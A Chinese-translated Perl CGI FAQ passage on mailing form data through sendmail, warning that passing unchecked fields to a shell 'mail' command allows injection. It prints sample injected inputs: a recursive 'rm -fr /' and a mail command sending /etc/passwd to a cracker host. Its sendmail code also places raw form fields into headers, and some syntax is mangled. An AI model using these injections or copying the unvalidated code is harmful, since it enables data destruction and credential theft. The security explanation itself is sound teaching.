其实做这个很容易。您的 CGI script 必须能做到这两件事： 　　

　　将 form 中的资料整理出来。别忘了，所有的 form 资料都会被 URL-编码起来 （先不考虑 Netscape 2.0 【及 2.0 以上所支援】的 multipart MIME资料）。

　　开一个管路 (pipe) 到 mail （或 sendmail ），然後把 form 资料写过去。

　　我们就假设您用的是 CGI::* 模组。您可用以下的方法去叫 sendmail： 　　

　　$cgi_form = new CGI::Form; 　　

　　$from = $cgi_form->param('from');

　　$name = $cgi_form->param('name');

　　$to = $cgi_form->param('to');

　　$subject = $cgi_form->param('subject');

　　$message = $cgi_form->param('message');

　　

　　open SENDMAIL, "　 /usr/bin/sendmail -t -n";

　　print SENDMAIL <

　　From: $from <$name>

　　To: $to

　　Reply-To: $from

　　Subject: $subject

　　

　　$message

　　End_of_Mail 　　

　　有一个该注意的地方是 ``Reply-To:'' 的信头。由於 server 是以 ``nobody''这 个使用者的身份来跑，信头的地方可能会被搞坏（尤其是当有人想回这封信的时後）。 加上 ``Reply-To'' 的信头这个问题便解决了。 　　

　　网路上有许多的 mail 渠道 (gateway)* 是以底下这种方法来送 mail： 　　

　　【译者】gateway 在此指送 email 的 CGI 程式 　　

　　open MAIL, "　 mail -s 'Subject' $to"; +-- 可能会出问题的漏洞！！！ 　　

　　如果您没有先检查看 $to 这个变数有没有内含 shell 的特殊符号 (metacharacters)，您是在自讨苦吃！譬如，如果哪个恶劣的 user 输入了以下的资 料：

　　; rm -fr / ;

　　那麽您的麻烦可大了*。 　　

　　【译者】这里头的 ``;'' 便是一个危险的 shell metacharacter。另一个危险的符号是 ``&''。

　　在这个假想的情况中，有多少个档案会被远方的 user 给杀掉，还得视 server 跑的使用者的权限而定（这就是为什麽 server 要以低权限使用者身份跑的原因）。 至少那些由 CGI 程式制造出来，但又没有备份的档案，是真的要跟它们永别了。

　　; mail joe@crackerland.org

　　那您的 CGI script 就替您把 /etc/passwd 给拱手送上了。这对一个「未加工」的 Linux、SunOS 4.1，还有其他任何没安装 shadow-password 的 UNIX 系统来说， 实在不太好玩。如果 server 错误地跑了 root，那麽就算装了 shadow-password 也没有用，因为远方的 cracker 甚至可以让这个 CGI 的 email script 给他送 /etc/shadow （视系统而定，不一定在 /etc 底下或叫这个名字）。